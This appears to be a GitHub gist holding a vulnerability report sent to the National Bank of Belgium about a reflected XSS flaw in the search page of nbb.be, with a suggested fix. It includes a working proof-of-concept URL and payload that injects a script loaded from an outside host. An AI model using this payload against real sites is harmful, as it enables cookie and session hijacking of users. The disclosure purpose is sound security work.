Skip to content

Instantly share code, notes, and snippets.

@MiguelBel
Created August 12, 2014 18:29
Show Gist options
  • Save MiguelBel/72bb9f1919be4d78a41a to your computer and use it in GitHub Desktop.
Save MiguelBel/72bb9f1919be4d78a41a to your computer and use it in GitHub Desktop.
National Bank of Belgium
Send to IT or IT-Security department ASAP.
Hi, I found a vulnerability in your web (http://nbb.be), that allows to execute custom javascript code.
---
Bypass Google Chrome Auditor: No
Web: http://nbb.be
Vulnerability: Reflected XSS
PoC (Proof of concept): http://nbb.be/pub/App/Search/Search.aspx?l=en&q=xss%22%20style=%22font-size:99px;%22%3Escript%3C/a%3E%3Cscript%20src=%22https://gist.githubusercontent.com/MiguelBel/3c27aeba5b3e75442673/raw/2c78f786e0011939e4606e4fb67af69c73809050/Sample%20XSS%20attack%22%3C!--
Attack Vector: xss" style="font-size:99px;">script</a><script src="https://gist.githubusercontent.com/MiguelBel/3c27aeba5b3e75442673/raw/2c78f786e0011939e4606e4fb67af69c73809050/Sample XSS attack"<!--
Description: Allows to the user to execute custom javascript code that is used to hijack cookies and sessions.Can be very harmful for someone who have bad intention.
Solution: Escape the special chars '';!--"<XSS>=&{()}
Best regards and await your reply.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment